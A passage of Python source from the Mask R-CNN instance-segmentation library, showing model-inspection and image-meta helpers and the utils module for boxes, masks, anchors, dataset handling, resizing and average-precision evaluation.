""" model = self.keras_model # Organize desired outputs into an ordered dict outputs = OrderedDict(outputs) for o in outputs.values(): assert o is not None # Build a Keras function to run parts of the computation graph inputs = model.inputs if model.uses_learning_phase and not isinstance(K.learning_phase(), int): inputs += [K.learning_phase()] kf = K.function(model.inputs, list(outputs.values())) # Prepare inputs if image_metas is None: molded_images, image_metas, _ = self.mold_inputs(images) else: molded_images = images image_shape = molded_images[0].shape # Anchors anchors = self.get_anchors(image_shape) # Duplicate across the batch dimension because Keras requires it # TODO: can this be optimized to avoid duplicating the anchors? anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape) model_in = [molded_images, image_metas, anchors] # Run inference if model.uses_learning_phase and not isinstance(K.learning_phase(), int): model_in.append(0.) outputs_np = kf(model_in) # Pack the generated Numpy arrays into a a dict and log the results. outputs_np = OrderedDict([(k, v) for k, v in zip(outputs.keys(), outputs_np)]) for k, v in outputs_np.items(): log(k, v) return outputs_np ############################################################ # Data Formatting ############################################################ def compose_image_meta(image_id, original_image_shape, image_shape, window, scale, active_class_ids): """Takes attributes of an image and puts them in one 1D array. image_id: An int ID of the image. Useful for debugging. original_image_shape: [H, W, C] before resizing or padding. image_shape: [H, W, C] after resizing and padding window: (y1, x1, y2, x2) in pixels. The area of the image where the real image is (excluding the padding) scale: The scaling factor applied to the original image (float32) active_class_ids: List of class_ids available in the dataset from which the image came. Useful if training on images from multiple datasets where not all classes are present in all datasets. """ meta = np.array( [image_id] + # size=1 list(original_image_shape) + # size=3 list(image_shape) + # size=3 list(window) + # size=4 (y1, x1, y2, x2) in image cooredinates [scale] + # size=1 list(active_class_ids) # size=num_classes ) return meta def parse_image_meta(meta): """Parses an array that contains image attributes to its components. See compose_image_meta() for more details. meta: [batch, meta length] where meta length depends on NUM_CLASSES Returns a dict of the parsed values. """ image_id = meta[:, 0] original_image_shape = meta[:, 1:4] image_shape = meta[:, 4:7] window = meta[:, 7:11] # (y1, x1, y2, x2) window of image in in pixels scale = meta[:, 11] active_class_ids = meta[:, 12:] return { "image_id": image_id.astype(np.int32), "original_image_shape": original_image_shape.astype(np.int32), "image_shape": image_shape.astype(np.int32), "window": window.astype(np.int32), "scale": scale.astype(np.float32), "active_class_ids": active_class_ids.astype(np.int32), } def parse_image_meta_graph(meta): """Parses a tensor that contains image attributes to its components. See compose_image_meta() for more details. meta: [batch, meta length] where meta length depends on NUM_CLASSES Returns a dict of the parsed tensors. 
""" image_id = meta[:, 0] original_image_shape = meta[:, 1:4] image_shape = meta[:, 4:7] window = meta[:, 7:11] # (y1, x1, y2, x2) window of image in in pixels scale = meta[:, 11] active_class_ids = meta[:, 12:] return { "image_id": image_id, "original_image_shape": original_image_shape, "image_shape": image_shape, "window": window, "scale": scale, "active_class_ids": active_class_ids, } def mold_image(images, config): """Expects an RGB image (or array of images) and subtracts the mean pixel and converts it to float. Expects image colors in RGB order. """ return images.astype(np.float32) - config.MEAN_PIXEL def unmold_image(normalized_images, config): """Takes a image normalized with mold() and returns the original.""" return (normalized_images + config.MEAN_PIXEL).astype(np.uint8) ############################################################ # Miscellenous Graph Functions ############################################################ def trim_zeros_graph(boxes, name='trim_zeros'): """Often boxes are represented with matrices of shape [N, 4] and are padded with zeros. This removes zero boxes. boxes: [N, 4] matrix of boxes. non_zeros: [N] a 1D boolean mask identifying the rows to keep """ non_zeros = tf.cast(tf.reduce_sum(tf.abs(boxes), axis=1), tf.bool) boxes = tf.boolean_mask(boxes, non_zeros, name=name) return boxes, non_zeros def batch_pack_graph(x, counts, num_rows): """Picks different number of values from each row in x depending on the values in counts. """ outputs = [] for i in range(num_rows): outputs.append(x[i, :counts[i]]) return tf.concat(outputs, axis=0) def norm_boxes_graph(boxes, shape): """Converts boxes from pixel coordinates to normalized coordinates. boxes: [..., (y1, x1, y2, x2)] in pixel coordinates shape: [..., (height, width)] in pixels Note: In pixel coordinates (y2, x2) is outside the box. But in normalized coordinates it's inside the box. Returns: [..., (y1, x1, y2, x2)] in normalized coordinates """ h, w = tf.split(tf.cast(shape, tf.float32), 2) scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0) shift = tf.constant([0., 0., 1., 1.]) return tf.divide(boxes - shift, scale) def denorm_boxes_graph(boxes, shape): """Converts boxes from normalized coordinates to pixel coordinates. boxes: [..., (y1, x1, y2, x2)] in normalized coordinates shape: [..., (height, width)] in pixels Note: In pixel coordinates (y2, x2) is outside the box. But in normalized coordinates it's inside the box. Returns: [..., (y1, x1, y2, x2)] in pixel coordinates """ h, w = tf.split(tf.cast(shape, tf.float32), 2) scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0) shift = tf.constant([0., 0., 1., 1.]) return tf.cast(tf.round(tf.multiply(boxes, scale) + shift), tf.int32) File: mrcnn/utils.py """ Mask R-CNN Common utility functions and classes. Copyright (c) 2017 Matterport, Inc. 
Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import sys import os import logging import math import random import numpy as np import tensorflow as tf import scipy import skimage.color import skimage.io import skimage.transform import urllib.request import shutil import warnings from distutils.version import LooseVersion # URL from which to download the latest COCO trained weights COCO_MODEL_URL = "https://github.com/matterport/Mask_RCNN/releases/download/v2.0/mask_rcnn_coco.h5" ############################################################ # Bounding Boxes ############################################################ def extract_bboxes(mask): """Compute bounding boxes from masks. mask: [height, width, num_instances]. Mask pixels are either 1 or 0. Returns: bbox array [num_instances, (y1, x1, y2, x2)]. """ boxes = np.zeros([mask.shape[-1], 4], dtype=np.int32) for i in range(mask.shape[-1]): m = mask[:, :, i] # Bounding box. horizontal_indicies = np.where(np.any(m, axis=0))[0] vertical_indicies = np.where(np.any(m, axis=1))[0] if horizontal_indicies.shape[0]: x1, x2 = horizontal_indicies[[0, -1]] y1, y2 = vertical_indicies[[0, -1]] # x2 and y2 should not be part of the box. Increment by 1. x2 += 1 y2 += 1 else: # No mask for this instance. Might happen due to # resizing or cropping. Set bbox to zeros x1, x2, y1, y2 = 0, 0, 0, 0 boxes[i] = np.array([y1, x1, y2, x2]) return boxes.astype(np.int32) def compute_iou(box, boxes, box_area, boxes_area): """Calculates IoU of the given box with the array of the given boxes. box: 1D vector [y1, x1, y2, x2] boxes: [boxes_count, (y1, x1, y2, x2)] box_area: float. the area of 'box' boxes_area: array of length boxes_count. Note: the areas are passed in rather than calculated here for efficiency. Calculate once in the caller to avoid duplicate work. """ # Calculate intersection areas y1 = np.maximum(box[0], boxes[:, 0]) y2 = np.minimum(box[2], boxes[:, 2]) x1 = np.maximum(box[1], boxes[:, 1]) x2 = np.minimum(box[3], boxes[:, 3]) intersection = np.maximum(x2 - x1, 0) * np.maximum(y2 - y1, 0) union = box_area + boxes_area[:] - intersection[:] iou = intersection / union return iou def compute_overlaps(boxes1, boxes2): """Computes IoU overlaps between two sets of boxes. boxes1, boxes2: [N, (y1, x1, y2, x2)]. For better performance, pass the largest set first and the smaller second. """ # Areas of anchors and GT boxes area1 = (boxes1[:, 2] - boxes1[:, 0]) * (boxes1[:, 3] - boxes1[:, 1]) area2 = (boxes2[:, 2] - boxes2[:, 0]) * (boxes2[:, 3] - boxes2[:, 1]) # Compute overlaps to generate matrix [boxes1 count, boxes2 count] # Each cell contains the IoU value. overlaps = np.zeros((boxes1.shape[0], boxes2.shape[0])) for i in range(overlaps.shape[1]): box2 = boxes2[i] overlaps[:, i] = compute_iou(box2, boxes1, area2[i], area1) return overlaps def compute_overlaps_masks(masks1, masks2): """Computes IoU overlaps between two sets of masks. 
masks1, masks2: [Height, Width, instances] """ # If either set of masks is empty return empty result if masks1.shape[-1] == 0 or masks2.shape[-1] == 0: return np.zeros((masks1.shape[-1], masks2.shape[-1])) # flatten masks and compute their areas masks1 = np.reshape(masks1 > .5, (-1, masks1.shape[-1])).astype(np.float32) masks2 = np.reshape(masks2 > .5, (-1, masks2.shape[-1])).astype(np.float32) area1 = np.sum(masks1, axis=0) area2 = np.sum(masks2, axis=0) # intersections and union intersections = np.dot(masks1.T, masks2) union = area1[:, None] + area2[None, :] - intersections overlaps = intersections / union return overlaps def non_max_suppression(boxes, scores, threshold): """Performs non-maximum suppression and returns indices of kept boxes. boxes: [N, (y1, x1, y2, x2)]. Notice that (y2, x2) lays outside the box. scores: 1-D array of box scores. threshold: Float. IoU threshold to use for filtering. """ assert boxes.shape[0] > 0 if boxes.dtype.kind != "f": boxes = boxes.astype(np.float32) # Compute box areas y1 = boxes[:, 0] x1 = boxes[:, 1] y2 = boxes[:, 2] x2 = boxes[:, 3] area = (y2 - y1) * (x2 - x1) # Get indicies of boxes sorted by scores (highest first) ixs = scores.argsort()[::-1] pick = [] while len(ixs) > 0: # Pick top box and add its index to the list i = ixs[0] pick.append(i) # Compute IoU of the picked box with the rest iou = compute_iou(boxes[i], boxes[ixs[1:]], area[i], area[ixs[1:]]) # Identify boxes with IoU over the threshold. This # returns indices into ixs[1:], so add 1 to get # indices into ixs. remove_ixs = np.where(iou > threshold)[0] + 1 # Remove indices of the picked and overlapped boxes. ixs = np.delete(ixs, remove_ixs) ixs = np.delete(ixs, 0) return np.array(pick, dtype=np.int32) def apply_box_deltas(boxes, deltas): """Applies the given deltas to the given boxes. boxes: [N, (y1, x1, y2, x2)]. Note that (y2, x2) is outside the box. deltas: [N, (dy, dx, log(dh), log(dw))] """ boxes = boxes.astype(np.float32) # Convert to y, x, h, w height = boxes[:, 2] - boxes[:, 0] width = boxes[:, 3] - boxes[:, 1] center_y = boxes[:, 0] + 0.5 * height center_x = boxes[:, 1] + 0.5 * width # Apply deltas center_y += deltas[:, 0] * height center_x += deltas[:, 1] * width height *= np.exp(deltas[:, 2]) width *= np.exp(deltas[:, 3]) # Convert back to y1, x1, y2, x2 y1 = center_y - 0.5 * height x1 = center_x - 0.5 * width y2 = y1 + height x2 = x1 + width return np.stack([y1, x1, y2, x2], axis=1) def box_refinement_graph(box, gt_box): """Compute refinement needed to transform box to gt_box. box and gt_box are [N, (y1, x1, y2, x2)] """ box = tf.cast(box, tf.float32) gt_box = tf.cast(gt_box, tf.float32) height = box[:, 2] - box[:, 0] width = box[:, 3] - box[:, 1] center_y = box[:, 0] + 0.5 * height center_x = box[:, 1] + 0.5 * width gt_height = gt_box[:, 2] - gt_box[:, 0] gt_width = gt_box[:, 3] - gt_box[:, 1] gt_center_y = gt_box[:, 0] + 0.5 * gt_height gt_center_x = gt_box[:, 1] + 0.5 * gt_width dy = (gt_center_y - center_y) / height dx = (gt_center_x - center_x) / width dh = tf.log(gt_height / height) dw = tf.log(gt_width / width) result = tf.stack([dy, dx, dh, dw], axis=1) return result def box_refinement(box, gt_box): """Compute refinement needed to transform box to gt_box. box and gt_box are [N, (y1, x1, y2, x2)]. (y2, x2) is assumed to be outside the box. 
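Illustrative example (editor's sketch, not part of the original source):

    box = np.array([[10., 10., 20., 20.]])
    gt_box = np.array([[12., 12., 22., 22.]])
    box_refinement(box, gt_box)
    # -> array([[0.2, 0.2, 0., 0.]], dtype=float32)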
""" box = box.astype(np.float32) gt_box = gt_box.astype(np.float32) height = box[:, 2] - box[:, 0] width = box[:, 3] - box[:, 1] center_y = box[:, 0] + 0.5 * height center_x = box[:, 1] + 0.5 * width gt_height = gt_box[:, 2] - gt_box[:, 0] gt_width = gt_box[:, 3] - gt_box[:, 1] gt_center_y = gt_box[:, 0] + 0.5 * gt_height gt_center_x = gt_box[:, 1] + 0.5 * gt_width dy = (gt_center_y - center_y) / height dx = (gt_center_x - center_x) / width dh = np.log(gt_height / height) dw = np.log(gt_width / width) return np.stack([dy, dx, dh, dw], axis=1) ############################################################ # Dataset ############################################################ class Dataset(object): """The base class for dataset classes. To use it, create a new class that adds functions specific to the dataset you want to use. For example: class CatsAndDogsDataset(Dataset): def load_cats_and_dogs(self): ... def load_mask(self, image_id): ... def image_reference(self, image_id): ... See COCODataset and ShapesDataset as examples. """ def __init__(self, class_map=None): self._image_ids = [] self.image_info = [] # Background is always the first class self.class_info = [{"source": "", "id": 0, "name": "BG"}] self.source_class_ids = {} def add_class(self, source, class_id, class_name): assert "." not in source, "Source name cannot contain a dot" # Does the class exist already? for info in self.class_info: if info['source'] == source and info["id"] == class_id: # source.class_id combination already available, skip return # Add the class self.class_info.append({ "source": source, "id": class_id, "name": class_name, }) def add_image(self, source, image_id, path, **kwargs): image_info = { "id": image_id, "source": source, "path": path, } image_info.update(kwargs) self.image_info.append(image_info) def image_reference(self, image_id): """Return a link to the image in its source Website or details about the image that help looking it up or debugging it. Override for your dataset, but pass to this function if you encounter images not in your dataset. """ return "" def prepare(self, class_map=None): """Prepares the Dataset class for use. TODO: class map is not supported yet. When done, it should handle mapping classes from different datasets to the same class ID. """ def clean_name(name): """Returns a shorter version of object names for cleaner display.""" return ",".join(name.split(",")[:1]) # Build (or rebuild) everything else from the info dicts. 
self.num_classes = len(self.class_info) self.class_ids = np.arange(self.num_classes) self.class_names = [clean_name(c["name"]) for c in self.class_info] self.num_images = len(self.image_info) self._image_ids = np.arange(self.num_images) # Mapping from source class and image IDs to internal IDs self.class_from_source_map = {"{}.{}".format(info['source'], info['id']): id for info, id in zip(self.class_info, self.class_ids)} self.image_from_source_map = {"{}.{}".format(info['source'], info['id']): id for info, id in zip(self.image_info, self.image_ids)} # Map sources to class_ids they support self.sources = list(set([i['source'] for i in self.class_info])) self.source_class_ids = {} # Loop over datasets for source in self.sources: self.source_class_ids[source] = [] # Find classes that belong to this dataset for i, info in enumerate(self.class_info): # Include BG class in all datasets if i == 0 or source == info['source']: self.source_class_ids[source].append(i) def map_source_class_id(self, source_class_id): """Takes a source class ID and returns the int class ID assigned to it. For example: dataset.map_source_class_id("coco.12") -> 23 """ return self.class_from_source_map[source_class_id] def get_source_class_id(self, class_id, source): """Map an internal class ID to the corresponding class ID in the source dataset.""" info = self.class_info[class_id] assert info['source'] == source return info['id'] @property def image_ids(self): return self._image_ids def source_image_link(self, image_id): """Returns the path or URL to the image. Override this to return a URL to the image if it's available online for easy debugging. """ return self.image_info[image_id]["path"] def load_image(self, image_id): """Load the specified image and return a [H,W,3] Numpy array. """ # Load image image = skimage.io.imread(self.image_info[image_id]['path']) # If grayscale. Convert to RGB for consistency. if image.ndim != 3: image = skimage.color.gray2rgb(image) # If has an alpha channel, remove it for consistency if image.shape[-1] == 4: image = image[..., :3] return image def load_mask(self, image_id): """Load instance masks for the given image. Different datasets use different ways to store masks. Override this method to load instance masks and return them in the form of am array of binary masks of shape [height, width, instances]. Returns: masks: A bool array of shape [height, width, instance count] with a binary mask per instance. class_ids: a 1D array of class IDs of the instance masks. """ # Override this function to load a mask from your dataset. # Otherwise, it returns an empty mask. logging.warning("You are using the default load_mask(), maybe you need to define your own one.") mask = np.empty([0, 0, 0]) class_ids = np.empty([0], np.int32) return mask, class_ids def resize_image(image, min_dim=None, max_dim=None, min_scale=None, mode="square"): """Resizes an image keeping the aspect ratio unchanged. min_dim: if provided, resizes the image such that it's smaller dimension == min_dim max_dim: if provided, ensures that the image longest side doesn't exceed this value. min_scale: if provided, ensure that the image is scaled up by at least this percent even if min_dim doesn't require it. mode: Resizing mode. none: No resizing. Return the image unchanged. square: Resize and pad with zeros to get a square image of size [max_dim, max_dim]. pad64: Pads width and height with zeros to make them multiples of 64. If min_dim or min_scale are provided, it scales the image up before padding. max_dim is ignored in this mode. 
The multiple of 64 is needed to ensure smooth scaling of feature maps up and down the 6 levels of the FPN pyramid (2**6=64). crop: Picks random crops from the image. First, scales the image based on min_dim and min_scale, then picks a random crop of size min_dim x min_dim. Can be used in training only. max_dim is not used in this mode. Returns: image: the resized image window: (y1, x1, y2, x2). If max_dim is provided, padding might be inserted in the returned image. If so, this window is the coordinates of the image part of the full image (excluding the padding). The x2, y2 pixels are not included. scale: The scale factor used to resize the image padding: Padding added to the image [(top, bottom), (left, right), (0, 0)] """ # Keep track of image dtype and return results in the same dtype image_dtype = image.dtype # Default window (y1, x1, y2, x2) and default scale == 1. h, w = image.shape[:2] window = (0, 0, h, w) scale = 1 padding = [(0, 0), (0, 0), (0, 0)] crop = None if mode == "none": return image, window, scale, padding, crop # Scale? if min_dim: # Scale up but not down scale = max(1, min_dim / min(h, w)) if min_scale and scale < min_scale: scale = min_scale # Does it exceed max dim? if max_dim and mode == "square": image_max = max(h, w) if round(image_max * scale) > max_dim: scale = max_dim / image_max # Resize image using bilinear interpolation if scale != 1: image = resize(image, (round(h * scale), round(w * scale)), preserve_range=True) # Need padding or cropping? if mode == "square": # Get new height and width h, w = image.shape[:2] top_pad = (max_dim - h) // 2 bottom_pad = max_dim - h - top_pad left_pad = (max_dim - w) // 2 right_pad = max_dim - w - left_pad padding = [(top_pad, bottom_pad), (left_pad, right_pad), (0, 0)] image = np.pad(image, padding, mode='constant', constant_values=0) window = (top_pad, left_pad, h + top_pad, w + left_pad) elif mode == "pad64": h, w = image.shape[:2] # Both sides must be divisible by 64 assert min_dim % 64 == 0, "Minimum dimension must be a multiple of 64" # Height if h % 64 > 0: max_h = h - (h % 64) + 64 top_pad = (max_h - h) // 2 bottom_pad = max_h - h - top_pad else: top_pad = bottom_pad = 0 # Width if w % 64 > 0: max_w = w - (w % 64) + 64 left_pad = (max_w - w) // 2 right_pad = max_w - w - left_pad else: left_pad = right_pad = 0 padding = [(top_pad, bottom_pad), (left_pad, right_pad), (0, 0)] image = np.pad(image, padding, mode='constant', constant_values=0) window = (top_pad, left_pad, h + top_pad, w + left_pad) elif mode == "crop": # Pick a random crop h, w = image.shape[:2] y = random.randint(0, (h - min_dim)) x = random.randint(0, (w - min_dim)) crop = (y, x, min_dim, min_dim) image = image[y:y + min_dim, x:x + min_dim] window = (0, 0, min_dim, min_dim) else: raise Exception("Mode {} not supported".format(mode)) return image.astype(image_dtype), window, scale, padding, crop def resize_mask(mask, scale, padding, crop=None): """Resizes a mask using the given scale and padding. Typically, you get the scale and padding from resize_image() to ensure both, the image and the mask, are resized consistently. 
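    mask: [height, width, num_instances] array of instance masks to resize.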
scale: mask scaling factor padding: Padding to add to the mask in the form [(top, bottom), (left, right), (0, 0)] """ # Suppress warning from scipy 0.13.0, the output shape of zoom() is # calculated with round() instead of int() with warnings.catch_warnings(): warnings.simplefilter("ignore") mask = scipy.ndimage.zoom(mask, zoom=[scale, scale, 1], order=0) if crop is not None: y, x, h, w = crop mask = mask[y:y + h, x:x + w] else: mask = np.pad(mask, padding, mode='constant', constant_values=0) return mask def minimize_mask(bbox, mask, mini_shape): """Resize masks to a smaller version to reduce memory load. Mini-masks can be resized back to image scale using expand_masks() See inspect_data.ipynb notebook for more details. """ mini_mask = np.zeros(mini_shape + (mask.shape[-1],), dtype=bool) for i in range(mask.shape[-1]): # Pick slice and cast to bool in case load_mask() returned wrong dtype m = mask[:, :, i].astype(bool) y1, x1, y2, x2 = bbox[i][:4] m = m[y1:y2, x1:x2] if m.size == 0: raise Exception("Invalid bounding box with area of zero") # Resize with bilinear interpolation m = resize(m, mini_shape) mini_mask[:, :, i] = np.around(m).astype(np.bool) return mini_mask def expand_mask(bbox, mini_mask, image_shape): """Resizes mini masks back to image size. Reverses the change of minimize_mask(). See inspect_data.ipynb notebook for more details. """ mask = np.zeros(image_shape[:2] + (mini_mask.shape[-1],), dtype=bool) for i in range(mask.shape[-1]): m = mini_mask[:, :, i] y1, x1, y2, x2 = bbox[i][:4] h = y2 - y1 w = x2 - x1 # Resize with bilinear interpolation m = resize(m, (h, w)) mask[y1:y2, x1:x2, i] = np.around(m).astype(np.bool) return mask # TODO: Build and use this function to reduce code duplication def mold_mask(mask, config): pass def unmold_mask(mask, bbox, image_shape): """Converts a mask generated by the neural network to a format similar to its original shape. mask: [height, width] of type float. A small, typically 28x28 mask. bbox: [y1, x1, y2, x2]. The box to fit the mask in. Returns a binary mask with the same size as the original image. """ threshold = 0.5 y1, x1, y2, x2 = bbox mask = resize(mask, (y2 - y1, x2 - x1)) mask = np.where(mask >= threshold, 1, 0).astype(np.bool) # Put the mask in the right location. full_mask = np.zeros(image_shape[:2], dtype=np.bool) full_mask[y1:y2, x1:x2] = mask return full_mask ############################################################ # Anchors ############################################################ def generate_anchors(scales, ratios, shape, feature_stride, anchor_stride): """ scales: 1D array of anchor sizes in pixels. Example: [32, 64, 128] ratios: 1D array of anchor ratios of width/height. Example: [0.5, 1, 2] shape: [height, width] spatial shape of the feature map over which to generate anchors. feature_stride: Stride of the feature map relative to the image in pixels. anchor_stride: Stride of anchors on the feature map. For example, if the value is 2 then generate anchors for every other feature map pixel. 
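    Returns:
        anchors: [N, (y1, x1, y2, x2)] anchor boxes in image pixel coordinates,
            one row per combination of scale, ratio, and anchor position.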
""" # Get all combinations of scales and ratios scales, ratios = np.meshgrid(np.array(scales), np.array(ratios)) scales = scales.flatten() ratios = ratios.flatten() # Enumerate heights and widths from scales and ratios heights = scales / np.sqrt(ratios) widths = scales * np.sqrt(ratios) # Enumerate shifts in feature space shifts_y = np.arange(0, shape[0], anchor_stride) * feature_stride shifts_x = np.arange(0, shape[1], anchor_stride) * feature_stride shifts_x, shifts_y = np.meshgrid(shifts_x, shifts_y) # Enumerate combinations of shifts, widths, and heights box_widths, box_centers_x = np.meshgrid(widths, shifts_x) box_heights, box_centers_y = np.meshgrid(heights, shifts_y) # Reshape to get a list of (y, x) and a list of (h, w) box_centers = np.stack( [box_centers_y, box_centers_x], axis=2).reshape([-1, 2]) box_sizes = np.stack([box_heights, box_widths], axis=2).reshape([-1, 2]) # Convert to corner coordinates (y1, x1, y2, x2) boxes = np.concatenate([box_centers - 0.5 * box_sizes, box_centers + 0.5 * box_sizes], axis=1) return boxes def generate_pyramid_anchors(scales, ratios, feature_shapes, feature_strides, anchor_stride): """Generate anchors at different levels of a feature pyramid. Each scale is associated with a level of the pyramid, but each ratio is used in all levels of the pyramid. Returns: anchors: [N, (y1, x1, y2, x2)]. All generated anchors in one array. Sorted with the same order of the given scales. So, anchors of scale[0] come first, then anchors of scale[1], and so on. """ # Anchors # [anchor_count, (y1, x1, y2, x2)] anchors = [] for i in range(len(scales)): anchors.append(generate_anchors(scales[i], ratios, feature_shapes[i], feature_strides[i], anchor_stride)) return np.concatenate(anchors, axis=0) ############################################################ # Miscellaneous ############################################################ def trim_zeros(x): """It's common to have tensors larger than the available data and pad with zeros. This function removes rows that are all zeros. x: [rows, columns]. """ assert len(x.shape) == 2 return x[~np.all(x == 0, axis=1)] def compute_matches(gt_boxes, gt_class_ids, gt_masks, pred_boxes, pred_class_ids, pred_scores, pred_masks, iou_threshold=0.5, score_threshold=0.0): """Finds matches between prediction and ground truth instances. Returns: gt_match: 1-D array. For each GT box it has the index of the matched predicted box. pred_match: 1-D array. For each predicted box, it has the index of the matched ground truth box. overlaps: [pred_boxes, gt_boxes] IoU overlaps. """ # Trim zero padding # TODO: cleaner to do zero unpadding upstream gt_boxes = trim_zeros(gt_boxes) gt_masks = gt_masks[..., :gt_boxes.shape[0]] pred_boxes = trim_zeros(pred_boxes) pred_scores = pred_scores[:pred_boxes.shape[0]] # Sort predictions by score from high to low indices = np.argsort(pred_scores)[::-1] pred_boxes = pred_boxes[indices] pred_class_ids = pred_class_ids[indices] pred_scores = pred_scores[indices] pred_masks = pred_masks[..., indices] # Compute IoU overlaps [pred_masks, gt_masks] overlaps = compute_overlaps_masks(pred_masks, gt_masks) # Loop through predictions and find matching ground truth boxes match_count = 0 pred_match = -1 * np.ones([pred_boxes.shape[0]]) gt_match = -1 * np.ones([gt_boxes.shape[0]]) for i in range(len(pred_boxes)): # Find best matching ground truth box # 1. Sort matches by score sorted_ixs = np.argsort(overlaps[i])[::-1] # 2. 
Remove low scores low_score_idx = np.where(overlaps[i, sorted_ixs] < score_threshold)[0] if low_score_idx.size > 0: sorted_ixs = sorted_ixs[:low_score_idx[0]] # 3. Find the match for j in sorted_ixs: # If ground truth box is already matched, go to next one if gt_match[j] > -1: continue # If we reach IoU smaller than the threshold, end the loop iou = overlaps[i, j] if iou < iou_threshold: break # Do we have a match? if pred_class_ids[i] == gt_class_ids[j]: match_count += 1 gt_match[j] = i pred_match[i] = j break return gt_match, pred_match, overlaps def compute_ap(gt_boxes, gt_class_ids, gt_masks, pred_boxes, pred_class_ids, pred_scores, pred_masks, iou_threshold=0.5): """Compute Average Precision at a set IoU threshold (default 0.5). Returns: mAP: Mean Average Precision precisions: List of precisions at different class score thresholds. recalls: List of recall values at different class score thresholds. overlaps: [pred_boxes, gt_boxes] IoU overlaps. """ # Get matches and overlaps gt_match, pred_match, overlaps = compute_matches( gt_boxes, gt_class_ids, gt_masks, pred_boxes, pred_class_ids, pred_scores, pred_masks, iou_threshold) # Compute precision and recall at each prediction box step precisions = np.cumsum(pred_match > -1) / (np.arange(len(pred_match)) + 1) recalls = np.cumsum(pred_match > -1).astype(np.float32) / len(gt_match) # Pad with start and end values to simplify the math precisions = np.concatenate([[0], precisions, [0]]) recalls = np.concatenate([[0], recalls, [1]]) # Ensure precision values decrease but don't increase. This way, the # precision value at each recall threshold is the maximum it can be # for all following recall thresholds, as specified by the VOC paper. for i in range(len(precisions) - 2, -1, -1): precisions[i] = np.maximum(precisions[i], precisions[i + 1]) # Compute mean AP over recall range indices = np.where(recalls[:-1] != recalls[1:])[0] + 1 mAP = np.sum((recalls[indices] - recalls[indices - 1]) * precisions[indices]) return mAP, precisions, recalls, overlaps def compute_ap_range(gt_box, gt_class_id, gt_mask, pred_box, pred_class_id, pred_score, pred_mask, iou_thresholds=None, verbose=1): """Compute AP over a range or IoU thresholds. Default range is 0.5-0.95.""" # Default is 0.5 to 0.95 with increments of 0.05 iou_thresholds = iou_thresholds or np.arange(0.5, 1.0, 0.05) # Compute AP over range of IoU thresholds AP = [] for iou_threshold in iou_thresholds: ap, precisions, recalls, overlaps =\ compute_ap(gt_box, gt_class_id, gt_mask, pred_box, pred_class_id, pred_score, pred_mask, iou_threshold=iou_threshold) if verbose: print("AP @{:.2f}:\t {:.3f}".format(iou_threshold, ap)) AP.append(ap) AP = np.array(AP).mean() if verbose: print("AP @{:.2f}-{:.2f}:\t {:.3f}".format( iou_thresholds[0], iou_thresholds[-1], AP)) return AP def compute_recall(pred_boxes, gt_boxes, iou): """Compute the recall at the given IoU threshold. It's an indication of how many GT boxes were found by the given prediction boxes. pred_boxes: [N, (y1, x1, y2, x2)] in image coordinates gt_boxes: [N, (y1, x1, y2, x2)] in image coordinates """ # Measure overlaps overlaps = compute_overlaps(pred_boxes, gt_boxes) iou_max = np.max(overlaps, axis=1) iou_argmax = np.argmax(overlaps, axis=1) positive_ids = np.where(iou_max >= iou)[0] matched_gt_boxes = iou_argmax[positive_ids] recall = len(set(matched_gt_boxes)) / gt_boxes.shape[0] return recall, positive_ids # ## Batch Slicing # Some custom layers support a batch size of 1 only, and require a lot of work # to support batches greater than 1. 
This function slices an input tensor # across the batch dimension and feeds batches of size 1. Effectively, # an easy way to support batches > 1 quickly with little code modification. # In the long run, it's more efficient to modify the code to support large # batches and getting rid of this function. Consider this a temporary solution def batch_slice(inputs, graph_fn, batch_size, names=None): """Splits inputs into slices and feeds each slice to a copy of the given computation graph and then combines the results. It allows you to run a graph on a batch of inputs even if the graph is written to support one instance only. inputs: list of tensors. All must have the same first dimension length graph_fn: A function that returns a TF tensor that's part of a graph. batch_size: number of slices to divide the data into. names: If provided, assigns names to the resulting tensors. """ if not isinstance(inputs, list): inputs = [inputs] outputs = [] for i in range(batch_size): inputs_slice = [x[i] for x in inputs] output_slice = graph_fn(*inputs_slice) if not isinstance(output_slice, (tuple, list)): output_slice = [output_slice] outputs.append(output_slice) # Change outputs from a list of slices where each is # a list of outputs to a list of outputs and each has # a list of slices outputs = list(zip(*outputs)) if names is None: names = [None] * len(outputs) result = [tf.stack(o, axis=0, name=n) for o, n in zip(outputs, names)] if len(result) == 1: result = result[0] return result def download_trained_weights(coco_model_path, verbose=1): """Download COCO trained weights from Releases. coco_model_path: local path of COCO trained weights """ if verbose > 0: print("Downloading pretrained model to " + coco_model_path + " ...") with urllib.request.urlopen(COCO_MODEL_URL) as resp, open(coco_model_path, 'wb') as out: shutil.copyfileobj(resp, out) if verbose > 0: print("... done downloading pretrained model!") def norm_boxes(boxes, shape): """Converts boxes from pixel coordinates to normalized coordinates. boxes: [N, (y1, x1, y2, x2)] in pixel coordinates shape: [..., (height, width)] in pixels Note: In pixel coordinates (y2, x2) is outside the box. But in normalized coordinates it's inside the box. Returns: [N, (y1, x1, y2, x2)] in normalized coordinates """ h, w = shape scale = np.array([h - 1, w - 1, h - 1, w - 1]) shift = np.array([0, 0, 1, 1]) return np.divide((boxes - shift), scale).astype(np.float32) def denorm_boxes(boxes, shape): """Converts boxes from normalized coordinates to pixel coordinates. boxes: [N, (y1, x1, y2, x2)] in normalized coordinates shape: [..., (height, width)] in pixels Note: In pixel coordinates (y2, x2) is outside the box. But in normalized coordinates it's inside the box. Returns: [N, (y1, x1, y2, x2)] in pixel coordinates """ h, w = shape scale = np.array([h - 1, w - 1, h - 1, w - 1]) shift = np.array([0, 0, 1, 1]) return np.around(np.multiply(boxes, scale) + shift).astype(np.int32) def resize(image, output_shape, order=1, mode='constant', cval=0, clip=True, preserve_range=False, anti_aliasing=False, anti_aliasing_sigma=None): """A wrapper for Scikit-Image resize(). Scikit-Image generates warnings on every call to resize() if it doesn't receive the right parameters. The right parameters depend on the version of skimage. This solves the problem by using different parameters per version. And it provides a central place to control resizing defaults. """ if LooseVersion(skimage.__version__) >= LooseVersion("0.14"): # New in 0.14: anti_aliasing. 
Default it to False for backward # compatibility with skimage 0.13. return skimage.transform.resize( image, output_shape, order=order, mode=mode, cval=cval, clip=clip, preserve_range=preserve_range, anti_aliasing=anti_aliasing, anti_aliasing_sigma=anti_aliasing_sigma) else: return skimage.transform.resize( image, output_shape, order=order, mode=mode, cval=cval, clip=clip, preserve_range=preserve_range)
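

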